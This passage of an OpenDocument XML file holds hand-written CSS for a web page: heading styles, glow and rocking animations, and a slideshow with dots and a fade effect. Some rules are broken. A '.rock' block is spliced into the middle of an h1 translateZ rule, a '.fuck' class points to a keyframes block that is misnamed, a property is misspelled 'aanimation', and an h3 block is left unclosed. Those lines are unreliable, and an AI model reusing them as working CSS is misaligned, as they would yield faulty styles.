      <text:p text:style-name="P1"><text:span text:style-name="T557">}</text:span><text:span text:style-name="T558"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T558"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T559">h</text:span><text:span text:style-name="T560">1<text:s/></text:span><text:span text:style-name="T561">{</text:span><text:span text:style-name="T562"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T563"><text:s/>display:block;</text:span><text:span text:style-name="T564"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T565"><text:s/>width:</text:span><text:span text:style-name="T566">90</text:span><text:span text:style-name="T567">%;</text:span><text:span text:style-name="T568"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T569"><text:s/>line-height:</text:span><text:span text:style-name="T570">1.5</text:span><text:span text:style-name="T571">;</text:span><text:span text:style-name="T572"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T573"><text:s/>font:</text:span><text:span text:style-name="T574">900 35</text:span><text:span text:style-name="T575">px 'Concert One', sans-serif;</text:span><text:span text:style-name="T576"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T577"><text:s/>position:absolute;</text:span><text:span text:style-name="T578"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T579"><text:s/>color:#fff;</text:span><text:span text:style-name="T580"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T581">}</text:span><text:span text:style-name="T582"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T582"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T583">@keyframes glow {</text:span><text:span text:style-name="T584"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T585"><text:s/>0</text:span><text:span text:style-name="T586">%,</text:span><text:span text:style-name="T587">100</text:span><text:span text:style-name="T588">%{ text-shadow:</text:span><text:span text:style-name="T589">0 0 30</text:span><text:span text:style-name="T590">px red; }</text:span><text:span text:style-name="T591"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T592"><text:s/>25</text:span><text:span text:style-name="T593">%{ text-shadow:</text:span><text:span text:style-name="T594">0 0 30</text:span><text:span text:style-name="T595">px orange; }</text:span><text:span text:style-name="T596"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T597"><text:s/>50</text:span><text:span text:style-name="T598">%{ text-shadow:</text:span><text:span text:style-name="T599">0 0 30</text:span><text:span text:style-name="T600">px forestgreen; }</text:span><text:span text:style-name="T601"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T602"><text:s/>75</text:span><text:span text:style-name="T603">%{ text-shadow:</text:span><text:span text:style-name="T604">0 0 30</text:span><text:span text:style-name="T605">px cyan; }</text:span><text:span text:style-name="T606"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T607">}</text:span><text:span text:style-name="T608"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T608"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T609">h</text:span><text:span text:style-name="T610">1</text:span><text:span text:style-name="T611">:nth-child(</text:span><text:span text:style-name="T612">2</text:span><text:span text:style-name="T613">){ transform:translateZ(</text:span><text:span text:style-name="T614">5</text:span><text:span text:style-name="T615">px); }</text:span><text:span text:style-name="T616"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T617">h</text:span><text:span text:style-name="T618">1</text:span><text:span text:style-name="T619">:nth-child(</text:span><text:span text:style-name="T620">3</text:span><text:span text:style-name="T621">){ transform:translateZ(</text:span><text:span text:style-name="T622">10</text:span><text:span text:style-name="T623">px);}</text:span><text:span text:style-name="T624"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T625">h</text:span><text:span text:style-name="T626">1</text:span><text:span text:style-name="T627">:nth-child(</text:span><text:span text:style-name="T628">4</text:span><text:span text:style-name="T629">){ transform:translateZ(</text:span><text:span text:style-name="T630">15</text:span><text:span text:style-name="T631">px); }</text:span><text:span text:style-name="T632"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T633">h</text:span><text:span text:style-name="T634">1</text:span><text:span text:style-name="T635">:nth-child(</text:span><text:span text:style-name="T636">5</text:span><text:span text:style-name="T637">){ transform:translateZ(</text:span><text:span text:style-name="T638">20</text:span><text:span text:style-name="T639">px); }</text:span><text:span text:style-name="T640"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T641">h</text:span><text:span text:style-name="T642">1</text:span><text:span text:style-name="T643">:nth-child(</text:span><text:span text:style-name="T644">6</text:span><text:span text:style-name="T645">){ transform:translateZ(</text:span><text:span text:style-name="T646">25</text:span><text:span text:style-name="T647">px); }</text:span><text:span text:style-name="T648"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T649">h</text:span><text:span text:style-name="T650">1</text:span><text:span text:style-name="T651">:nth-child(</text:span><text:span text:style-name="T652">7</text:span><text:span text:style-name="T653">){ transform:translateZ(</text:span><text:span text:style-name="T654">30</text:span><text:span text:style-name="T655">p.rock{animation:infinite<text:s/></text:span><text:span text:style-name="T656">1</text:span><text:span text:style-name="T657">s rock}</text:span><text:span text:style-name="T658"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T659">@keyframes rock {<text:s/></text:span><text:span text:style-name="T660">0</text:span><text:span text:style-name="T661">% { transform: rotate(-</text:span><text:span text:style-name="T662">1</text:span><text:span text:style-name="T663">deg); }</text:span><text:span text:style-name="T664"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T665"><text:s/>50</text:span><text:span text:style-name="T666">% { transform: rotate(</text:span><text:span text:style-name="T667">2</text:span><text:span text:style-name="T668">deg); }</text:span><text:span text:style-name="T669"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T670"><text:s/>100</text:span><text:span text:style-name="T671">% { transform: rotate(-</text:span><text:span text:style-name="T672">1</text:span><text:span text:style-name="T673">deg); }}x); }</text:span><text:span text:style-name="T674"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T675">h</text:span><text:span text:style-name="T676">1</text:span><text:span text:style-name="T677">:nth-child(</text:span><text:span text:style-name="T678">8</text:span><text:span text:style-name="T679">){ transform:translateZ(</text:span><text:span text:style-name="T680">35</text:span><text:span text:style-name="T681">px); }</text:span><text:span text:style-name="T682"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T683">h</text:span><text:span text:style-name="T684">1</text:span><text:span text:style-name="T685">:nth-child(</text:span><text:span text:style-name="T686">9</text:span><text:span text:style-name="T687">){ transform:translateZ(</text:span><text:span text:style-name="T688">40</text:span><text:span text:style-name="T689">px); }</text:span><text:span text:style-name="T690"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T691">h</text:span><text:span text:style-name="T692">1</text:span><text:span text:style-name="T693">:nth-child(</text:span><text:span text:style-name="T694">10</text:span><text:span text:style-name="T695">){ transform:translateZ(</text:span><text:span text:style-name="T696">45</text:span><text:span text:style-name="T697">px); }</text:span><text:span text:style-name="T698"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T698"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T698"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T698"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T699">.rock{animation:infinite<text:s/></text:span><text:span text:style-name="T700">1</text:span><text:span text:style-name="T701">s rock}</text:span><text:span text:style-name="T702"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T703">@keyframes rock {<text:s/></text:span><text:span text:style-name="T704">0</text:span><text:span text:style-name="T705">% { transform: rotate(-</text:span><text:span text:style-name="T706">1</text:span><text:span text:style-name="T707">deg); }</text:span><text:span text:style-name="T708"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T709"><text:s/>50</text:span><text:span text:style-name="T710">% { transform: rotate(</text:span><text:span text:style-name="T711">2</text:span><text:span text:style-name="T712">deg); }</text:span><text:span text:style-name="T713"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T714"><text:s/>100</text:span><text:span text:style-name="T715">% { transform: rotate(-</text:span><text:span text:style-name="T716">1</text:span><text:span text:style-name="T717">deg); }}</text:span><text:span text:style-name="T718"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T718"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T719">.fuck{animation:infinite<text:s/></text:span><text:span text:style-name="T720">1</text:span><text:span text:style-name="T721">s fuck}</text:span><text:span text:style-name="T722"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T723">@keyframes rock {<text:s/></text:span><text:span text:style-name="T724">0</text:span><text:span text:style-name="T725">% { transform: rotate(-</text:span><text:span text:style-name="T726">2</text:span><text:span text:style-name="T727">deg); }</text:span><text:span text:style-name="T728"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T729"><text:s/>50</text:span><text:span text:style-name="T730">% { transform: rotate(</text:span><text:span text:style-name="T731">2</text:span><text:span text:style-name="T732">deg); }</text:span><text:span text:style-name="T733"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T734"><text:s/>100</text:span><text:span text:style-name="T735">% { transform: rotate(-</text:span><text:span text:style-name="T736">2</text:span><text:span text:style-name="T737">deg); }}</text:span><text:span text:style-name="T738"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T738"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T738"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T739">h</text:span><text:span text:style-name="T740">2<text:s/></text:span><text:span text:style-name="T741">{</text:span><text:span text:style-name="T742"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T743"><text:s/></text:span><text:span text:style-name="T744"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T745"><text:s/>-webkit-animation: bounceIn<text:s/></text:span><text:span text:style-name="T746">4</text:span><text:span text:style-name="T747">s cubic-bezier(</text:span><text:span text:style-name="T748">0.68</text:span><text:span text:style-name="T749">, -</text:span><text:span text:style-name="T750">0.55</text:span><text:span text:style-name="T751">,<text:s/></text:span><text:span text:style-name="T752">0.27</text:span><text:span text:style-name="T753">,<text:s/></text:span><text:span text:style-name="T754">1.55</text:span><text:span text:style-name="T755">) infinite;</text:span><text:span text:style-name="T756"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T757"><text:s/>animation: bounceIn<text:s/></text:span><text:span text:style-name="T758">4</text:span><text:span text:style-name="T759">s cubic-bezier(</text:span><text:span text:style-name="T760">0.68</text:span><text:span text:style-name="T761">, -</text:span><text:span text:style-name="T762">0.55</text:span><text:span text:style-name="T763">,<text:s/></text:span><text:span text:style-name="T764">0.27</text:span><text:span text:style-name="T765">,<text:s/></text:span><text:span text:style-name="T766">1.55</text:span><text:span text:style-name="T767">) infinite;</text:span><text:span text:style-name="T768"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T769"><text:s/>-webkit-transition: all .</text:span><text:span text:style-name="T770">2</text:span><text:span text:style-name="T771">s;</text:span><text:span text:style-name="T772"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T773"><text:s/>transition: all .</text:span><text:span text:style-name="T774">2</text:span><text:span text:style-name="T775">s;</text:span><text:span text:style-name="T776"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T777"><text:s/>font-size:<text:s/></text:span><text:span text:style-name="T778">35</text:span><text:span text:style-name="T779">px;</text:span><text:span text:style-name="T780"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T781"><text:s/>text-transform: uppercase;</text:span><text:span text:style-name="T782"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T783"><text:s/>TEXT-ALIGN:CENTER;</text:span><text:span text:style-name="T784"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T785"><text:s/>color: #</text:span><text:span text:style-name="T786">138808</text:span><text:span text:style-name="T787">;</text:span><text:span text:style-name="T788"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T789"><text:s/>text-shadow: -</text:span><text:span text:style-name="T790">2</text:span><text:span text:style-name="T791">px<text:s/></text:span><text:span text:style-name="T792">0</text:span><text:span text:style-name="T793">px<text:s/></text:span><text:span text:style-name="T794">1</text:span><text:span text:style-name="T795">px #</text:span><text:span text:style-name="T796">22414</text:span><text:span text:style-name="T797">f, -</text:span><text:span text:style-name="T798">4</text:span><text:span text:style-name="T799">px<text:s/></text:span><text:span text:style-name="T800">0</text:span><text:span text:style-name="T801">px<text:s/></text:span><text:span text:style-name="T802">1</text:span><text:span text:style-name="T803">px #</text:span><text:span text:style-name="T804">22414</text:span><text:span text:style-name="T805">f, -</text:span><text:span text:style-name="T806">6</text:span><text:span text:style-name="T807">px<text:s/></text:span><text:span text:style-name="T808">0</text:span><text:span text:style-name="T809">px<text:s/></text:span><text:span text:style-name="T810">1</text:span><text:span text:style-name="T811">px #</text:span><text:span text:style-name="T812">22414</text:span><text:span text:style-name="T813">f, -</text:span><text:span text:style-name="T814">1</text:span><text:span text:style-name="T815">px -</text:span><text:span text:style-name="T816">1</text:span><text:span text:style-name="T817">px<text:s/></text:span><text:span text:style-name="T818">1</text:span><text:span text:style-name="T819">px #</text:span><text:span text:style-name="T820">22414</text:span><text:span text:style-name="T821">f, -</text:span><text:span text:style-name="T822">1</text:span><text:span text:style-name="T823">px -</text:span><text:span text:style-name="T824">2</text:span><text:span text:style-name="T825">px<text:s/></text:span><text:span text:style-name="T826">1</text:span><text:span text:style-name="T827">px #</text:span><text:span text:style-name="T828">22414</text:span><text:span text:style-name="T829">f, -</text:span><text:span text:style-name="T830">2</text:span><text:span text:style-name="T831">px -</text:span><text:span text:style-name="T832">1</text:span><text:span text:style-name="T833">px<text:s/></text:span><text:span text:style-name="T834">1</text:span><text:span text:style-name="T835">px #</text:span><text:span text:style-name="T836">22414</text:span><text:span text:style-name="T837">f, -</text:span><text:span text:style-name="T838">2</text:span><text:span text:style-name="T839">px -</text:span><text:span text:style-name="T840">2</text:span><text:span text:style-name="T841">px<text:s/></text:span><text:span text:style-name="T842">1</text:span><text:span text:style-name="T843">px #</text:span><text:span text:style-name="T844">22414</text:span><text:span text:style-name="T845">f, -</text:span><text:span text:style-name="T846">3</text:span><text:span text:style-name="T847">px -</text:span><text:span text:style-name="T848">3</text:span><text:span text:style-name="T849">px<text:s/></text:span><text:span text:style-name="T850">1</text:span><text:span text:style-name="T851">px #</text:span><text:span text:style-name="T852">22414</text:span><text:span text:style-name="T853">f, -</text:span><text:span text:style-name="T854">4</text:span><text:span text:style-name="T855">px -</text:span><text:span text:style-name="T856">4</text:span><text:span text:style-name="T857">px<text:s/></text:span><text:span text:style-name="T858">1</text:span><text:span text:style-name="T859">px #</text:span><text:span text:style-name="T860">22414</text:span><text:span text:style-name="T861">f, -</text:span><text:span text:style-name="T862">5</text:span><text:span text:style-name="T863">px -</text:span><text:span text:style-name="T864">5</text:span><text:span text:style-name="T865">px<text:s/></text:span><text:span text:style-name="T866">1</text:span><text:span text:style-name="T867">px #</text:span><text:span text:style-name="T868">22414</text:span><text:span text:style-name="T869">f, -</text:span><text:span text:style-name="T870">6</text:span><text:span text:style-name="T871">px -</text:span><text:span text:style-name="T872">6</text:span><text:span text:style-name="T873">px<text:s/></text:span><text:span text:style-name="T874">1</text:span><text:span text:style-name="T875">px #</text:span><text:span text:style-name="T876">22414</text:span><text:span text:style-name="T877">f,<text:s/></text:span><text:span text:style-name="T878">0 0 15</text:span><text:span text:style-name="T879">px #</text:span><text:span text:style-name="T880">22414</text:span><text:span text:style-name="T881">f,<text:s/></text:span><text:span text:style-name="T882">0 0 20</text:span><text:span text:style-name="T883">px #</text:span><text:span text:style-name="T884">22414</text:span><text:span text:style-name="T885">f,<text:s/></text:span><text:span text:style-name="T886">1</text:span><text:span text:style-name="T887">px<text:s/></text:span><text:span text:style-name="T888">1</text:span><text:span text:style-name="T889">px #</text:span><text:span text:style-name="T890">22414</text:span><text:span text:style-name="T891">f,</text:span><text:span text:style-name="T892">2</text:span><text:span text:style-name="T893">px<text:s/></text:span><text:span text:style-name="T894">2</text:span><text:span text:style-name="T895">px #</text:span><text:span text:style-name="T896">22414</text:span><text:span text:style-name="T897">f;</text:span><text:span text:style-name="T898"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T898"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T899">}</text:span><text:span text:style-name="T900"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T900"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T901">h</text:span><text:span text:style-name="T902">3<text:s/></text:span><text:span text:style-name="T903">{</text:span><text:span text:style-name="T904"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T905"><text:s/>font-size:<text:s/></text:span><text:span text:style-name="T906">18</text:span><text:span text:style-name="T907">px;</text:span><text:span text:style-name="T908"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T909"><text:s/>text-align: center;</text:span><text:span text:style-name="T910"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T911"><text:s/>padding:</text:span><text:span text:style-name="T912">1</text:span><text:span text:style-name="T913">px;</text:span><text:span text:style-name="T914"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T915"><text:s/>margin:</text:span><text:span text:style-name="T916">1</text:span><text:span text:style-name="T917">px;</text:span><text:span text:style-name="T918"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T919"><text:s/>color: #ffffff;</text:span><text:span text:style-name="T920"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T921"><text:s/></text:span><text:span text:style-name="T922"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T923"><text:s/>aanimation: fuck infinite<text:s/></text:span><text:span text:style-name="T924">1</text:span><text:span text:style-name="T925">s;</text:span><text:span text:style-name="T926"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T927"><text:s/>font-family: 'Indie Flower', cursive;</text:span><text:span text:style-name="T928"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T929"><text:s/>letter-spacing:<text:s/></text:span><text:span text:style-name="T930">2</text:span><text:span text:style-name="T931">px;</text:span><text:span text:style-name="T932"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T933"><text:s text:c="2"/></text:span><text:span text:style-name="T934"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T935"><text:s text:c="2"/></text:span><text:span text:style-name="T936"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T937"><text:s text:c="2"/>* {box-sizing: border-box;}</text:span><text:span text:style-name="T938"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T939">body {font-family: Verdana, sans-serif;}</text:span><text:span text:style-name="T940"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T941">.mySlides {display: none;}</text:span><text:span text:style-name="T942"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T943">img {vertical-align: middle;}</text:span><text:span text:style-name="T944"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T944"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T945">.wb-slideshow-container {</text:span><text:span text:style-name="T946"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T947"><text:s/>max-width:<text:s/></text:span><text:span text:style-name="T948">1000</text:span><text:span text:style-name="T949">px;</text:span><text:span text:style-name="T950"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T951"><text:s/>position: relative;</text:span><text:span text:style-name="T952"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T953"><text:s/>margin: auto;</text:span><text:span text:style-name="T954"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T955">}</text:span><text:span text:style-name="T956"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T956"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T957">.text {</text:span><text:span text:style-name="T958"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T959"><text:s/>color: #f</text:span><text:span text:style-name="T960">2</text:span><text:span text:style-name="T961">f</text:span><text:span text:style-name="T962">2</text:span><text:span text:style-name="T963">f</text:span><text:span text:style-name="T964">2</text:span><text:span text:style-name="T965">;</text:span><text:span text:style-name="T966"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T967"><text:s/>font-size:<text:s/></text:span><text:span text:style-name="T968">15</text:span><text:span text:style-name="T969">px;</text:span><text:span text:style-name="T970"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T971"><text:s/>padding:<text:s/></text:span><text:span text:style-name="T972">8</text:span><text:span text:style-name="T973">px<text:s/></text:span><text:span text:style-name="T974">12</text:span><text:span text:style-name="T975">px;</text:span><text:span text:style-name="T976"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T977"><text:s/>position: absolute;</text:span><text:span text:style-name="T978"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T979"><text:s/>bottom:<text:s/></text:span><text:span text:style-name="T980">8</text:span><text:span text:style-name="T981">px;</text:span><text:span text:style-name="T982"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T983"><text:s/>width:<text:s/></text:span><text:span text:style-name="T984">100</text:span><text:span text:style-name="T985">%;</text:span><text:span text:style-name="T986"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T987"><text:s/>text-align: center;</text:span><text:span text:style-name="T988"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T989">}</text:span><text:span text:style-name="T990"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T990"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T991">/* Number text (</text:span><text:span text:style-name="T992">1</text:span><text:span text:style-name="T993">/</text:span><text:span text:style-name="T994">11<text:s/></text:span><text:span text:style-name="T995">etc) */</text:span><text:span text:style-name="T996"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T997">.numbertext {</text:span><text:span text:style-name="T998"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T999"><text:s/>color: #f</text:span><text:span text:style-name="T1000">2</text:span><text:span text:style-name="T1001">f</text:span><text:span text:style-name="T1002">2</text:span><text:span text:style-name="T1003">f</text:span><text:span text:style-name="T1004">2</text:span><text:span text:style-name="T1005">;</text:span><text:span text:style-name="T1006"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1007"><text:s/>font-size:<text:s/></text:span><text:span text:style-name="T1008">12</text:span><text:span text:style-name="T1009">px;</text:span><text:span text:style-name="T1010"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1011"><text:s/>padding:<text:s/></text:span><text:span text:style-name="T1012">8</text:span><text:span text:style-name="T1013">px<text:s/></text:span><text:span text:style-name="T1014">12</text:span><text:span text:style-name="T1015">px;</text:span><text:span text:style-name="T1016"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1017"><text:s/>position: absolute;</text:span><text:span text:style-name="T1018"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1019"><text:s/>top:<text:s/></text:span><text:span text:style-name="T1020">0</text:span><text:span text:style-name="T1021">;</text:span><text:span text:style-name="T1022"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1023">}</text:span><text:span text:style-name="T1024"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1024"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1025">/* The dots/bullets/indicators */</text:span><text:span text:style-name="T1026"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1027">.dot {</text:span><text:span text:style-name="T1028"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1029"><text:s/>height:<text:s/></text:span><text:span text:style-name="T1030">15</text:span><text:span text:style-name="T1031">px;</text:span><text:span text:style-name="T1032"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1033"><text:s/>width:<text:s/></text:span><text:span text:style-name="T1034">15</text:span><text:span text:style-name="T1035">px;</text:span><text:span text:style-name="T1036"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1037"><text:s/>margin:<text:s/></text:span><text:span text:style-name="T1038">0 2</text:span><text:span text:style-name="T1039">px;</text:span><text:span text:style-name="T1040"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1041"><text:s/>background-color: #bbb;</text:span><text:span text:style-name="T1042"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1043"><text:s/>border-radius:<text:s/></text:span><text:span text:style-name="T1044">50</text:span><text:span text:style-name="T1045">%;</text:span><text:span text:style-name="T1046"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1047"><text:s/>display: inline-block;</text:span><text:span text:style-name="T1048"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1049"><text:s/>transition: background-color<text:s/></text:span><text:span text:style-name="T1050">0.6</text:span><text:span text:style-name="T1051">s ease;</text:span><text:span text:style-name="T1052"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1053">}</text:span><text:span text:style-name="T1054"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1054"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1055">.active {</text:span><text:span text:style-name="T1056"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1057"><text:s/>background-color: #</text:span><text:span text:style-name="T1058">717171</text:span><text:span text:style-name="T1059">;</text:span><text:span text:style-name="T1060"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1061">}</text:span><text:span text:style-name="T1062"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1062"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1063">/* Fading animation */</text:span><text:span text:style-name="T1064"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1065">.fade {</text:span><text:span text:style-name="T1066"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1067"><text:s/>-webkit-animation-name: fade;</text:span><text:span text:style-name="T1068"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1069"><text:s/>-webkit-animation-duration:<text:s/></text:span><text:span text:style-name="T1070">1.5</text:span><text:span text:style-name="T1071">s;</text:span><text:span text:style-name="T1072"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1073"><text:s/>animation-name: fade;</text:span><text:span text:style-name="T1074"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1075"><text:s/>animation-duration:<text:s/></text:span><text:span text:style-name="T1076">1.5</text:span><text:span text:style-name="T1077">s;</text:span><text:span text:style-name="T1078"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1079">}</text:span><text:span text:style-name="T1080"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1080"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1081">@-webkit-keyframes fade {</text:span><text:span text:style-name="T1082"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1083"><text:s/>from {opacity: .</text:span><text:span text:style-name="T1084">4</text:span><text:span text:style-name="T1085">}<text:s/></text:span><text:span text:style-name="T1086"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1087"><text:s/>to {opacity:<text:s/></text:span><text:span text:style-name="T1088">1</text:span><text:span text:style-name="T1089">}</text:span><text:span text:style-name="T1090"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1091">}</text:span><text:span text:style-name="T1092"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1092"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1093">@keyframes fade {</text:span><text:span text:style-name="T1094"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1095"><text:s/>from {opacity: .</text:span><text:span text:style-name="T1096">4</text:span><text:span text:style-name="T1097">}<text:s/></text:span><text:span text:style-name="T1098"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1099"><text:s/>to {opacity:<text:s/></text:span><text:span text:style-name="T1100">1</text:span><text:span text:style-name="T1101">}</text:span><text:span text:style-name="T1102"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1103">}</text:span><text:span text:style-name="T1104"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1104"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1105">/* On smaller screens, decrease text size */</text:span><text:span text:style-name="T1106"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1107">@media only screen and (max-width:<text:s/></text:span><text:span text:style-name="T1108">300</text:span><text:span text:style-name="T1109">px) {</text:span><text:span text:style-name="T1110"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1111"><text:s/>.text {font-size:<text:s/></text:span><text:span text:style-name="T1112">11</text:span><text:span text:style-name="T1113">px}</text:span><text:span text:style-name="T1114"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1115"><text:s text:c="2"/></text:span><text:span text:style-name="T1116"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1117"><text:s text:c="2"/></text:span><text:span text:style-name="T1118"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1119">}</text:span><text:span text:style-name="T1120"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1121">&lt;/style&gt;</text:span><text:span text:style-name="T1122"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1122"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1122"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1123"><text:s/>&lt;style&gt;</text:span><text:span text:style-name="T1124"/></text:p>
      <text:p text:style-name="P1"><text:span text:style-name="T1125"><text:s/>body{</text:span><text:span text:style-name="T1126"/></text:p>
